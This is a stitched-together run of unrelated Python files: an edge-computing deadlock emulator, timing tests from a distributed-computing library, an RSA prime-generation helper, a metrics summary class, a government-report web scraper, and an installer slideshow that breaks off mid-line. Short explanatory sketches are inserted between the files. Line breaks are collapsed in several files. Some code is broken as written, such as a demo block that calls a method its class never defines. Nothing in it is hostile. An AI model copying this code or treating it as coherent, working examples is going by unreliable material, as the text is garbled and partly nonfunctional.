5, 5]) send = 'false' if not (False in list(np.greater_equal(_max, _need[j[:2]]))): send = 'true' # CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true': _send_task = f"{j}.{task_id}" send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]])) task_record[_send_task] = 'mec' task_id += 1 _off_mec += 1 # SENDS TASK TO MEC FOR EXECUTION w_send = mec_waiting_time[_host][-1] + 0.001 mec_waiting_time[_host].append(w_send) # adds a new average waiting time print('\n======SENDING {} TO MEC {}========='.format(i, _host)) elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)): _send_task = f"{j}.{task_id}" send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]])) task_record[_send_task] = 'mec' task_id += 1 _off_mec += 1 # SENDS TASK TO MEC FOR EXECUTION w_send = mec_waiting_time[_host][-1] + 0.001 mec_waiting_time[_host].append(w_send) # adds a new average waiting time print('\n======SENDING {} TO MEC {}========='.format(i, _host)) else: _send_task = f"{j}.{task_id}" _client.publish(cloud_ip, str([_send_task, t_time[j][0]]), ) task_record[_send_task] = 'cloud' task_id += 1 _off_cloud += 1 # send_cloud([j, t_time[j][0]]) # # [task_id,exec_time] # cloud_register[j.split('.')[2]] = send_back_host print('\n=========SENDING {} TO CLOUD==========='.format(i)) outward_mec = 0 offload_check = [0,0] def execute_re_offloaded_task(offloaded_task): global outward_mec, offload_check exec_list = get_exec_seq(offloaded_task[0]) outward_mec += len(exec_list) for i in offloaded_task[0]: # i = 't1.1.2.3*1_3' j = i.split('_')[0] time.sleep(offloaded_task[1][j] / 2) # print('j task: ', j) send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0])) clients_record = {} def count_task_sent(task): global clients_record c_id = task.split('.')[2] if c_id in clients_record: clients_record[c_id] += 1 else: clients_record[c_id] = 1 def execute(local): print('\nExecuting :', local) for i in local: j = i.split('_')[0] _t = t_time[j][0] / 2 time.sleep(_t) print('#{}'.format(local.index(i) + 1), ' Executed: ', i) _client.publish(j.split('.')[2], str({j: get_time() + ['local']}), ) count_task_sent(j) 
print('============== EXECUTION DONE ===============') cooperate = {'mec': 0, 'cloud': 0} def receive_offloaded_task_mec(): # run as a thread global _inward_mec global t_track while True: if stop == 1: print('Stopped: receive_offloaded_task_mec()') break else: data, address = sock2.recvfrom(1024) if len(data.decode()) > 0: da = data.decode().split(' ') if (address[0] not in ip_set) and (da[0] == node_id): # send back to client # send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client if da[1] in task_record: del task_record[da[1]] task_new = '.'.join(da[1].split('.')[:-1]) _client.publish(da[1].split('.')[2], str({task_new: get_time()+['mec']}), ) count_task_sent(da[1]) cooperate['mec'] += 1 else: print('*'*30 + f'\n{da[1]} Not in Task Record\n' + '*'*30) elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id): _received = ast.literal_eval(da[2] + da[3]) shared_resource_lock.acquire() task = _received[0] + '*{}'.format(t_track) reoffload_list[0].append(task) reoffload_list[1][task] = _received[1] shared_resource_lock.release() t_track += 1 _inward_mec += 1 def call_execute_re_offload(): global reoffload_list, outward_mec global offload_check while True: if stop == 1: print('Stopped: call_execute_re_offload()') break else: if len(reoffload_list[0]) == 1: t = reoffload_list[0][-1] time.sleep(reoffload_list[1][t] / 2) shared_resource_lock.acquire() reoffload_list[0].remove(t) del reoffload_list[1][t] shared_resource_lock.release() send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0])) outward_mec += 1 offload_check[0] += 1 elif len(reoffload_list[0]) > 1: o = reoffload_list.copy() offload_check[1] += len(o) execute_re_offloaded_task(o) for i in o[0]: shared_resource_lock.acquire() reoffload_list[0].remove(i) del reoffload_list[1][i] shared_resource_lock.release() def send_offloaded_task_mec(msg): _multicast_group = ('224.5.5.55', 20000) try: sock2.sendto(str.encode(msg), _multicast_group) except Exception as e: print(e) def send_email(msg): try: server = smtplib.SMTP_SSL('smtp.gmail.com') server.ehlo() server.login(config.email_address, config.password) subject = 'Deadlock results {}'.format(get_hostname()) # msg = 'Attendance done for {}'.format(_timer) _message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg) server.sendmail(config.email_address, config.send_email, _message) server.quit() print("Email sent!") except Exception as e: print(e) def mec_id(client_ip): _id = client_ip.split('.')[-1] if len(_id) == 1: return '00' + _id elif len(_id) == 2: return '0' + _id else: return _id def run_me(): global discovering global hosts initialization() while True: if len(hosts) == mec_no: print('MEC Details: ', hosts) del hosts[get_hostname()] discovering = 1 break time.sleep(2) start_loop() def save_and_abort(): global stop _id_ = get_hostname()[-1] result = f"\nwt{_id_}_16_{mec_no} = {mec_waiting_time} " \ f"\nrtt{_id_}_16_{mec_no} = {mec_rtt} \ncpu{_id_}_16_{mec_no} = {_cpu} " \ f"\noff_mec{_id_}_16_{mec_no} = {_off_mec} " \ f"\noff_cloud{_id_}_16_{mec_no} = {_off_cloud} " \ f"\ninward_mec{_id_}_16_{mec_no} = {_inward_mec}" \ f"\nloc{_id_}_16_{mec_no} = {_loc} " \ f"\ndeadlock{_id_}_16_{mec_no} = {deadlock} \nmemory{_id_}_16_{mec_no} = {memory}" \ f"\ntask_received{_id_}_16_{mec_no} = {total_received_task} \nsent_t{_id_}_16_{mec_no} = {clients_record}" \ f"\ncooperate{_id_}_16_{mec_no} = {cooperate} \ntask_record{_id_}_16_{mec_no} = {task_record}" \ f"\noutward_mec{_id_}_16_{mec_no} = {outward_mec}" \ 
f"\noffload_check{_id_}_16_{mec_no} = {offload_check}" list_result = [ f"\nwt{_id_}_16_{mec_no} = {mec_waiting_time} ", f"\nrtt{_id_}_16_{mec_no} = {mec_rtt} \ncpu{_id_}_16_{mec_no} = {_cpu} ", f"\noff_mec{_id_}_16_{mec_no} = {_off_mec} \noff_cloud{_id_}_16_{mec_no} = {_off_cloud} ", f"\ninward_mec{_id_}_16_{mec_no} = {_inward_mec}", f"\nloc{_id_}_16_{mec_no} = {_loc} ", f"\ndeadlock{_id_}_16_{mec_no} = {deadlock} \nmemory{_id_}_16_{mec_no} = {memory}", f"\ntask_received{_id_}_16_{mec_no} = {total_received_task} \nsent_t{_id_}_16_{mec_no} = {clients_record}", f"\ncooperate{_id_}_16_{mec_no} = {cooperate} \ntask_record{_id_}_16_{mec_no} = {task_record} " f"\noutward_mec{_id_}_16_{mec_no} = {outward_mec}", f"\noffload_check{_id_}_16_{mec_no} = {offload_check}" ] cmd = f"echo '' > /home/mec/result/linux/{_id_}_16_{mec_no}datal.py" os.system(cmd) cmd = f"echo '' > /home/mec/result/python/{_id_}_16_{mec_no}datap.py" os.system(cmd) file_ = open(f'/home/mec/result/python/{_id_}_16_{mec_no}datap.py', 'w') for i in list_result: cmd = f'echo "{i}" >> /home/mec/result/linux/{_id_}_16_{mec_no}datal.py' file_.write(i) os.system(cmd) file_.close() send_email(result) if len(task_record) > 0: for _task_ in task_record: task_new = '.'.join(_task_.split('.')[:-1]) _client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), ) stop += 1 ''' for i in thread_record: i.join() ''' _client.loop_stop() time.sleep(1) print('done') os.system('kill -9 {}'.format(os.getpid())) def start_loop(): global _loc global tasks global t_time global stop global node_id print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n') node_id = mec_id(ip_address()) # print('node id: ', node_id) _threads_ = [receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker] for i in _threads_: thread_record.append(Thread(target=i)) Thread(target=i).daemon = True Thread(target=i).start() x = gp.getpass('Press any key to Start...').lower() if x != 'exit': print('========= Waiting for tasks ==========') _time_ = dt.datetime.now() while True: try: if len(received_task_queue) > 0: info = received_task_queue.pop(0) tasks, t_time = info print('EDF List of Processes: ', tasks, '\n') print('\n========= Running Deadlock Algorithm ===========') list_seq = get_exec_seq(edf()) if len(list_seq) > 0: # do only when there is a task in safe sequence wait_list = calc_wait_time(list_seq) print('\nWaiting Time List: ', wait_list) compare_result = compare_local_mec(wait_list) print('\nExecute Locally: ', compare_result[1]) _loc += len(compare_result[1]) # total number of tasks to be executed locally print('\nExecute in MEC: ', compare_result[0]) if len(compare_result[0]) > 0: print('\nSending to cooperative platform') cooperative_mec(compare_result[0]) execute(compare_result[1]) show_graphs() _time_ = dt.datetime.now() else: send_message(str('wt {} 0.0'.format(ip_address()))) time.sleep(.4) now = dt.datetime.now() delta = now - _time_ if delta > dt.timedelta(minutes=4): print('terminating programme 3 mins elapsed') save_and_abort() break except KeyboardInterrupt: print('\nProgramme Terminated') save_and_abort() break def initialization(): global mec_no global host_ip global cloud_ip host_ip = ip_address() try: mec_no = int(input('Number of MECs: ').strip()) cloud_ip = input('Cloud Server IP: ').strip() print('\nCompiling MEC Details') h1 = Thread(target=receive_message) h2 = Thread(target=receive_offloaded_task_mec) thread_record.append(h1) thread_record.append(h2) h1.daemon = True h2.daemon = 
True h1.start() h2.start() while True: b = input('Send Hello Message (Y/N): ').strip().lower() if b == 'y': send_message('hello') break else: print('\nPlease Type "y" to send Hello message\n') except KeyboardInterrupt: print('\nProgramme Terminated') exit(0) def main(): global algo os.system('clear') print('mec ip: ', ip_address()) algo = psutil.Process() discovering_group() offloading_group() host_ip_set() run_me() if __name__ == "__main__": main()
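# A minimal standalone sketch of the cumulative moving-average update used by
# calculate_mov_avg() above:  mu_n = ((n - 1) * mu_{n-1} + x_n) / n.
# The sample wait times below are illustrative only.
def running_mean(samples):
    mu, n = 0.0, 0
    for x in samples:
        n += 1
        mu = ((n - 1) * mu + x) / n   # same update rule as calculate_mov_avg
    return mu

waits = [0.12, 0.30, 0.18, 0.24]
print(round(running_mean(waits), 4))      # 0.21
print(round(sum(waits) / len(waits), 4))  # 0.21 -- identical to the plain mean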
test_metrics.py
from __future__ import print_function, division, absolute_import

import sys
import threading
import time

from distributed import metrics
from distributed.compatibility import PY3
from distributed.utils_test import run_for


def test_wall_clock():
    for i in range(3):
        time.sleep(0.01)
        t = time.time()
        samples = [metrics.time() for j in range(50)]
        # Resolution
        deltas = [samples[j + 1] - samples[j] for j in range(len(samples) - 1)]
        assert min(deltas) >= 0.0, deltas
        assert max(deltas) <= 1.0, deltas
        assert any(0.0 < d < 0.0001 for d in deltas), deltas
        # Close to time.time()
        assert t - 0.5 < samples[0] < t + 0.5


def test_process_time():
    start = metrics.process_time()
    run_for(0.05)
    dt = metrics.process_time() - start
    assert 0.03 <= dt <= 0.2

    # All threads counted
    t = threading.Thread(target=run_for, args=(0.1,))
    start = metrics.process_time()
    t.start()
    t.join()
    dt = metrics.process_time() - start
    assert dt >= 0.05

    if PY3:
        # Sleep time not counted
        start = metrics.process_time()
        time.sleep(0.1)
        dt = metrics.process_time() - start
        assert dt <= 0.05


def test_thread_time():
    start = metrics.thread_time()
    run_for(0.05)
    dt = metrics.thread_time() - start
    assert 0.03 <= dt <= 0.2

    if PY3:
        # Sleep time not counted
        start = metrics.thread_time()
        time.sleep(0.1)
        dt = metrics.thread_time() - start
        assert dt <= 0.05

    if sys.platform == 'linux':
        # Always per-thread on Linux
        t = threading.Thread(target=run_for, args=(0.1,))
        start = metrics.thread_time()
        t.start()
        t.join()
        dt = metrics.thread_time() - start
        assert dt <= 0.05
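# A standalone illustration of the property these tests rely on: CPU-time
# clocks (process_time / thread_time) do not advance while a thread sleeps,
# whereas wall-clock time does. Uses only the standard library.
import time

wall_start = time.perf_counter()
cpu_start = time.process_time()
time.sleep(0.2)
print("wall elapsed:", round(time.perf_counter() - wall_start, 3))  # ~0.2
print("cpu elapsed: ", round(time.process_time() - cpu_start, 3))   # ~0.0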
parallel.py
# -*- coding: utf-8 -*-
#
# Copyright 2011 Sybren A. Stüvel <sybren@stuvel.eu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

'''Functions for parallel computation on multiple cores.

Introduced in Python-RSA 3.1.

.. note::

    Requires Python 2.6 or newer.

'''

from __future__ import print_function

import multiprocessing as mp

import rsa.prime
import rsa.randnum


def _find_prime(nbits, pipe):
    while True:
        integer = rsa.randnum.read_random_int(nbits)

        # Make sure it's odd
        integer |= 1

        # Test for primeness
        if rsa.prime.is_prime(integer):
            pipe.send(integer)
            return


def getprime(nbits, poolsize):
    '''Returns a prime number that can be stored in 'nbits' bits.

    Works in multiple processes at the same time.

    >>> p = getprime(128, 3)
    >>> rsa.prime.is_prime(p-1)
    False
    >>> rsa.prime.is_prime(p)
    True
    >>> rsa.prime.is_prime(p+1)
    False

    >>> from rsa import common
    >>> common.bit_size(p) == 128
    True

    '''

    (pipe_recv, pipe_send) = mp.Pipe(duplex=False)

    # Create processes
    procs = [mp.Process(target=_find_prime, args=(nbits, pipe_send))
             for _ in range(poolsize)]
    [p.start() for p in procs]

    result = pipe_recv.recv()

    [p.terminate() for p in procs]

    return result

__all__ = ['getprime']


if __name__ == '__main__':
    print('Running doctests 100x or until failure')
    import doctest

    for count in range(100):
        (failures, tests) = doctest.testmod()
        if failures:
            break

        if count and count % 10 == 0:
            print('%i times' % count)

    print('Doctests done')
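# A standalone sketch of the same "first worker to answer wins" pattern that
# getprime() uses, with a trivial search task in place of primality testing.
# The helper name and the predicate are illustrative only.
import multiprocessing as mp
import random


def _find_multiple_of_seven(pipe):
    while True:
        n = random.randint(1, 10000)
        if n % 7 == 0:
            pipe.send(n)
            return


if __name__ == '__main__':
    recv_end, send_end = mp.Pipe(duplex=False)
    workers = [mp.Process(target=_find_multiple_of_seven, args=(send_end,))
               for _ in range(3)]
    [w.start() for w in workers]
    answer = recv_end.recv()          # block until the first worker reports back
    [w.terminate() for w in workers]  # the race is over; stop the rest
    print(answer)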
summary.py
import threading import time from collections import defaultdict from typing import Callable, Dict, Mapping, TYPE_CHECKING # TODO: dont want pandas dependencies import numpy as np import pandas as pd if TYPE_CHECKING: from manta_lab.base.packet import SummaryPacket from manta_lab.sdk.interface.interface import Interface class NestedDict: def __init__(self) -> None: self._items = self._create_nested_dict() def _create_nested_dict(self): def _nested_dict(): return defaultdict(_nested_dict) return _nested_dict() def __getitem__(self, key): return self._items.__getitem__(key) def __setitem__(self, key, val): self._items.__setitem__(key, val) def _update(self, _item, d): for k, v in d.items(): if isinstance(v, dict): self._update(_item[k], v) else: _item[k] = v def update(self, d: Dict): self._update(self._items, d) @classmethod def from_flatten(cls, d: Dict): pass def _flatten(self, item, res, key): for k, v in item.items(): new_key = ".".join([key, k]) if isinstance(v, dict): self._flatten(v, res, new_key) else: res[new_key] = v def flatten(self): res = {} # self._flatten(self._items, res, "") for k, v in self._items.items(): try: self._flatten(v, res, k) except AttributeError: res[k] = v return res class Summary: """ Tracks single values for each metric for each run. Summary can handle numpy arrays and PyTorch/TensorFlow tensors. Summary will give you values like min, mean, variance, and percentiles. By default, a metric's summary is the last value of its History. For example, `ml.log({'something': 0.1})` will add a new step to History and update Summary to the latest value. But, in some cases, it's more useful to have the maximum or minimum of a metric instead of the final value. You can set history manually `(ml.summary['accuracy'] = best_acc)`. Examples: ```python ml.init() best_accuracy = 0 for epoch in range(epochs): test_loss, test_accuracy = function() if (test_accuracy > best_accuracy): ml.run.summary["best_accuracy"] = test_accuracy best_accuracy = test_accuracy ``` """ DEBOUNCE_SECONDS = 10 def __init__(self, interface: "Interface"): self.interface = interface self._df = pd.DataFrame() self._items = NestedDict() self._thread = None self._shutdown = False def _summarize(self): df = self._df df = df.loc[:, ~df.columns.str.startswith("_")] if not df.empty: df = df.describe() df = df.replace({np.nan: None}) return df.to_dict() def _exclude_media_items(self, d, res): for k, v in d.items(): if isinstance(v, Mapping): if "_type" not in v: # it means value is not media res[k] = {} self._exclude_media_items(v, res[k]) else: res[k] = v def update(self, d: Dict): if len(d) == 0: return _d = {} self._exclude_media_items(d, _d) # update nested dict self._items.update(_d) flatten_items = self._items.flatten() # update table # TODO: this logic can make too many rows self._df = self._df.append(flatten_items, ignore_index=True) # TODO: if rows are too long... 
def flush(self): try: summary = self._summarize() except ValueError: pass else: self.interface.publish_summary(summary) def start(self) -> None: if self._thread is None: self._shutdown = False self._thread = threading.Thread(target=self._thread_body) self._thread.name = "SummaryThread" self._thread.daemon = True if not self._thread.is_alive(): self._thread.start() def shutdown(self) -> None: self._shutdown = True try: if self._thread is not None: self._thread.join() finally: self._thread = None def _thread_body(self) -> None: while True: self.flush() # debouncing seconds = 0 while seconds < self.DEBOUNCE_SECONDS: time.sleep(1) seconds += 1 if self._shutdown: self.flush() return if __name__ == "__main__": netsted = NestedDict() netsted["a"]["b"]["c"]["d"] = 0.3 netsted.update({"a": {"b": {"d": 0.1}}}) netsted.flatten() netsted.update({"b": 3}) netsted.flatten() summary = Summary() summary.update({"a": {"b": {"d": 0.1}}}) summary.update({"a": {"b": {"d": 0.2}}}) summary.update({"a": {"b": {"d": 0.3}}}) summary.update({"a": {"b": {"d": 0.4}}}) summary.update({"a": {"b": {"d": 0.5}}}) summary = Summary() summary.update({"loss": 0.1, "ttt": 0.5}) summary.update({"loss": 0.2, "ttt": 0.4}) summary.update({"loss": 0.3, "ttt": 0.3}) summary.update({"loss": 0.4, "ttt": 0.2}) summary.update({"loss": 0.5, "ttt": 0.1}) print(summary.summarize())
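# A small usage sketch of the NestedDict defined above: nested updates are
# merged in place and flatten() exposes them under dotted keys. The metric
# names and values are illustrative only.
nd = NestedDict()
nd.update({"train": {"loss": 0.25, "acc": 0.91}})
nd.update({"train": {"loss": 0.20}, "epoch": 3})
print(nd.flatten())  # {'train.loss': 0.2, 'train.acc': 0.91, 'epoch': 3}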
SBM_TargetVsAchievement_Data_Script.py
import ctypes # for popup window import sys # for exception information try: # Main exception handler import requests # for HTTP requests from bs4 import BeautifulSoup # for HTML parsing import bs4 # for type checking import xlsxwriter # for exporting to Excel - need xlsx as over 200k rows of data import os # to find user's desktop path import time # for adding datestamp to file output import Queue # for multithreading import threading # for multithreading # Timing the script startTime = time.time() # Configuration of request variables url_SBM_TargetVsAchievement = 'http://sbm.gov.in/sbmreport/Report/Physical/SBM_TargetVsAchievement.aspx' stateKey = 'ctl00$ContentPlaceHolder1$ddlState' stateVal = '' districtKey = 'ctl00$ContentPlaceHolder1$ddlDistrict' districtVal = '' blockKey = 'ctl00$ContentPlaceHolder1$ddlBlock' blockVal = '' submitKey = 'ctl00$ContentPlaceHolder1$btnSubmit' submitVal = 'View Report' targetKey = '__EVENTTARGET' targetVal = '' # __EVENTVALIDATION and __VIEWSTATE are dynamic authentication values which must be freshly updated when making a request. eventValKey = '__EVENTVALIDATION' eventValVal = '' viewStateKey = '__VIEWSTATE' viewStateVal = '' # Queue for multithreading myQueue = Queue.Queue() # Function to return HTML parsed with BeautifulSoup from a POST request URL and parameters. def parsePOSTResponse(URL, parameters=''): responseHTMLParsed = '' attempts = 20 for i in range(attempts): r = requests.post(URL, data=parameters) if r.status_code == 200: responseHTML = r.content responseHTMLParsed = BeautifulSoup(responseHTML, 'html.parser') if not responseHTMLParsed == '': return responseHTMLParsed else: print (" Could not load page - attempt %s out of %s" % (i+1, attempts)) # Threading def threaded(f, daemon=False): def wrapped_f(q, *args, **kwargs): '''this function calls the decorated function and puts the result in a queue''' ret = f(*args, **kwargs) q.put(ret) def wrap(*args, **kwargs): '''this is the function returned from the decorator. It fires off wrapped_f in a new thread and returns the thread object with the result queue attached''' q = Queue.Queue() t = threading.Thread(target=wrapped_f, args=(q,)+args, kwargs=kwargs) t.daemon = daemon t.start() t.result_queue = q return t return wrap # Function to read the data in an individual block report @threaded def readBlockReport(URL, blockIndex, parameters='',): page = parsePOSTResponse(URL, parameters) # Process table data and output blockReportTable = page.find('table') if isinstance(blockReportTable,bs4.element.Tag): # Check whether data table successfully found on the page. Some blocks have no data. 
# Store table for writing headers after loop lastBlockReportTable = blockReportTable # Store state, district, and block information stateNameText = blockReportTable.find('span',{'id':'ctl00_ContentPlaceHolder1_Rpt_data_ctl00_lblstatename'}).text stateNameText = stateNameText.replace('State Name:-',''); stateNameText = stateNameText.strip(); districtNameText = blockReportTable.find('span',{'id':'ctl00_ContentPlaceHolder1_Rpt_data_ctl00_lbldtname'}).text districtNameText = districtNameText.replace('District Name:-',''); districtNameText = districtNameText.strip(); blockNameText = blockReportTable.find('span',{'id':'ctl00_ContentPlaceHolder1_Rpt_data_ctl00_lblblname'}).text blockNameText = blockNameText.replace('Block Name:-',''); blockNameText = blockNameText.strip(); # Loop through rows and write data into array to be returned #print ('Currently processing: ' + stateNameText + ' (' + str(stateCount) + ' of ' + str(len(stateOptionVals)) + ')' + ' > ' + districtNameText + ' (' + str(districtCount) + ' of ' + str(len(districtOptionVals)) + ')' + ' > ' + blockNameText + ' (' + str(blockIndex) + ' of ' + str(len(blockOptionVals)) + ')') blockReportRows = blockReportTable.find('tbody').findAll('tr') # Only process table body data tableArray = [] for tr in blockReportRows[0:len(blockReportRows)-1]: # Total row (bottom of table) dropped tableRow = [] cols = tr.findAll('td') # Write state, district, and block information tableRow.append(stateNameText) tableRow.append(districtNameText) tableRow.append(blockNameText) for td in cols: # Tidy and format the cell content cellText = td.text.replace('\*','') cellText = cellText.strip() try: int(cellText) cellText = int(cellText) except: cellText = cellText # Store the cell data tableRow.append(cellText) # TableArray.append(tableRow) # Try writing row at once #rowCount = rowCount + 1 tableArray.append(tableRow) return tableArray else: return -1 # print ('No data for: ' + stateNameText + ' (' + str(stateCount) + ' of ' + str(len(stateOptionVals)) + ')' + ' > ' + districtNameText + ' (' + str(districtCount) + ' of ' + str(len(districtOptionVals)) + ')' + ' > block (' + str(blockCount) + ' of ' + str(len(blockOptionVals)) + ')') # Load the default page and scrape the state and authentication values initPage = parsePOSTResponse(url_SBM_TargetVsAchievement) eventValVal = initPage.find('input',{'id':'__EVENTVALIDATION'})['value'] viewStateVal = initPage.find('input',{'id':'__VIEWSTATE'})['value'] stateOptions = [] stateOptionVals = [] stateSelection = initPage.find('select',{'id':'ctl00_ContentPlaceHolder1_ddlState'}) stateOptions = stateSelection.findAll('option',{'selected':''}) for stateOption in stateOptions: if 'All State' not in stateOption.text: stateOptionVal = stateOption['value'] stateOptionVals.append(stateOptionVal) # Initialise workbook todaysDate = time.strftime('%d-%m-%Y') desktopFile = os.path.expanduser('~/Desktop/SBM_TargetVsAchievement_' + todaysDate + '.xlsx') wb = xlsxwriter.Workbook(desktopFile) ws = wb.add_worksheet('SBM Test') ws.set_column('A:AZ', 22) rowCount = 1 # Adjust one row for printing table headers after main loop cellCount = 0 # Global variable to store final table data lastBlockReportTable = '' # Global variabless for keeping track of the state and GP stateCount = 1 blockCount = 1 GPCount = 0 # Data to be written into the file at the end of the loop fileOutput = [] # MAIN LOOP: loop through STATE values and scrape district and authentication values for each for stateOptionVal in stateOptionVals[:2]: # For testing, we can limit 
the states processed due to long runtime postParams = { eventValKey:eventValVal, viewStateKey:viewStateVal, stateKey:stateOptionVal, districtKey:'-1', blockKey:'-1', targetKey:'ctl00$ContentPlaceHolder1$ddlState' } statePage = parsePOSTResponse(url_SBM_TargetVsAchievement, postParams) state_eventValVal = statePage.find('input',{'id':'__EVENTVALIDATION'})['value'] state_viewStateVal = statePage.find('input',{'id':'__VIEWSTATE'})['value'] districtOptions = [] districtOptionVals = [] districtSelection = statePage.find('select',{'id':'ctl00_ContentPlaceHolder1_ddlDistrict'}) districtOptions = districtSelection.findAll('option',{'selected':''}) allBlocks = [] for districtOption in districtOptions: if 'All District' not in districtOption.text and 'STATE HEADQUARTER' not in districtOption.text: # We do not want the top level data for the state or state headquarter data districtOptionVal = districtOption['value'] districtOptionVals.append(districtOptionVal) # Loop through the DISTRICT values and scrape block and authentication values for each districtCount = 1 blockResultsArray = [] for districtOptionVal in districtOptionVals: state_postParams = { eventValKey:state_eventValVal, viewStateKey:state_viewStateVal, stateKey:stateOptionVal, districtKey:districtOptionVal, blockKey:'-1', targetKey:'ctl00$ContentPlaceHolder1$ddlDistrict' } districtPage = parsePOSTResponse(url_SBM_TargetVsAchievement, state_postParams) district_eventValVal = districtPage.find('input',{'id':'__EVENTVALIDATION'})['value'] district_viewStateVal = districtPage.find('input',{'id':'__VIEWSTATE'})['value'] blockOptions = [] blockOptionVals = [] blockSelection = districtPage.find('select',{'id':'ctl00_ContentPlaceHolder1_ddlBlock'}) blockOptions = blockSelection.findAll('option',{'selected':''}) for blockOption in blockOptions: if 'All Block' not in blockOption.text: # We do not want the top level data for the block blockOptionVal = blockOption['value'] blockOptionVals.append(blockOptionVal) # Loop through the BLOCK values and request the report for each for blockOptionVal in blockOptionVals: block_postParams = { eventValKey:district_eventValVal, viewStateKey:district_viewStateVal, stateKey:stateOptionVal, districtKey:districtOptionVal, blockKey:blockOptionVal, submitKey:submitVal } # Multithreading: Try and call all of the block report tables ofr a block in parallel allBlocks.append(readBlockReport(url_SBM_TargetVsAchievement, blockCount, block_postParams)) blockCount = blockCount + 1 blockCount = 1 result = [] for block in allBlocks: GPs = block.result_queue.get() if not GPs == -1: result.append(GPs) for r in range(len(GPs)): print ('Currently processing: ' + GPs[r][0] + ' (' + str(stateCount) + ' of ' + str(len(stateOptionVals)) + ')' + ' > ' + GPs[r][1] + ' (' + str(districtCount) + ' of ' + str(len(districtOptionVals)) + ')' + ' > ' + GPs[r][2] + ' (' + str(r + 1) + ' of ' + str(len(GPs)) + ')' + ' > ' + str(GPs[r][4])) blockResultsArray.append(result) fileOutput.append(blockResultsArray) # Wait for multithreading to finish districtCount = districtCount + 1 stateCount = stateCount + 1 # Write table headers based on final report # print ('Processing table headers...') # blockReportHeaderRows = lastBlockReportTable.find('thead').findAll('tr') # Only process table header data # headerTableArray = [] # rowCount = 0 # cellCount = 0 # headerStyle = wb.add_format({'bold': True, 'font_color': 'white', 'bg_color': '#0A8AD5'}) # for tr in blockReportHeaderRows[len(blockReportHeaderRows)-2:len(blockReportHeaderRows)-1]: # State, 
district, and block (bottom of table) + other headers dropped # headerTableRow = [] # headerCols = tr.findAll('th') # # Write state, district, and block headers # ws.write(rowCount,cellCount,'State Name',headerStyle) # cellCount = cellCount+1 # ws.write(rowCount,cellCount,'District Name',headerStyle) # cellCount = cellCount+1 # ws.write(rowCount,cellCount,'Block Name',headerStyle) # cellCount = cellCount+1 # for td in headerCols: # # Tidy the cell content # cellText = td.text.replace('\*','') # cellText = cellText.strip() # # Store the cell data # headerTableRow.append(cellText) # ws.write(rowCount,cellCount,cellText,headerStyle) # cellCount = cellCount+1 # #headerTableArray.append(tableRow) # rowCount = rowCount + 1 # cellCount = 0 print ('Done processing.' + ' Script executed in ' + str(int(time.time()-startTime)) + ' seconds.') # END MAIN LOOP # Write all data into the file r = 0 for b in blockResultsArray: for c in b: for d in c: ws.write_row(r, 0, d) r = r + 1 # Finally, save the workbook wb.close() except: # Main exception handler print('The program did not complete.') e = sys.exc_info() ctypes.windll.user32.MessageBoxW(0, "Sorry, there was a problem running this program.\n\nFor developer reference:\n\n" + str(e), "The program did not complete :-/", 1)
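# A Python 3 rendition of the @threaded decorator pattern used above: each
# decorated call returns immediately with its Thread object, and the result is
# later collected from the attached result_queue. slow_square is an
# illustrative stand-in for readBlockReport.
import queue
import threading
import time


def threaded(f, daemon=False):
    def wrap(*args, **kwargs):
        q = queue.Queue()
        t = threading.Thread(target=lambda: q.put(f(*args, **kwargs)), daemon=daemon)
        t.start()
        t.result_queue = q
        return t
    return wrap


@threaded
def slow_square(x):
    time.sleep(0.5)
    return x * x


jobs = [slow_square(n) for n in range(5)]      # all five calls run concurrently
print([j.result_queue.get() for j in jobs])    # [0, 1, 4, 9, 16]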
slides.py
#!/usr/bin/env python import gi gi.require_version('Gtk', '3.0') from gi.repository import Gtk, Gdk, GLib import threading from time import sleep import sys import os installer = "/usr/local/lib/gbi/" rcconfgbsd = "/etc/rc.conf.ghostbsd" rcconfdbsd = "/etc/rc.conf.desktopbsd" sys.path.append(installer) cssProvider = Gtk.CssProvider() #if os.path.exists(rcconfgbsd): # print(True) cssProvider.load_from_path('/usr/local/lib/gbi/ghostbsd-style.css') #elif os.path.exists(rcconfdbsd): # cssProvider.load_from_path('/usr/local/lib/gbi/desktopbsd-style.css') screen = Gdk.Screen.get_default() styleContext = Gtk.StyleContext() styleContext.add_provider_for_screen(screen, cssProvider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION) class gbsdSlides: def Welcome(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Welcome to GhostBSD!", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="welcome") hBox.show() vBox.pack_end(hBox, True, True, 0) vBox2 = Gtk.VBox(False, 0) vBox2.show() label2 = Gtk.Label(name="slideText") label2.set_markup("Thank you for choosing GhostBSD. We hope you enjoy the BSD experience.\n\n" "We believe every computer Operating System should be elegant, lightweight, and secure. It should respect your privacy and give the user true freedom. GhostBSD makes FreeBSD desktop computing much easier.\n\n" "We want GhostBSD to work for you. So while your software is installing, this slideshow will introduce you to GhostBSD.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) # label2.set_max_width_chars(10) label2.set_alignment(0.0, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def Software(self): vBox = Gtk.VBox(False, 0) vBox.show() label = 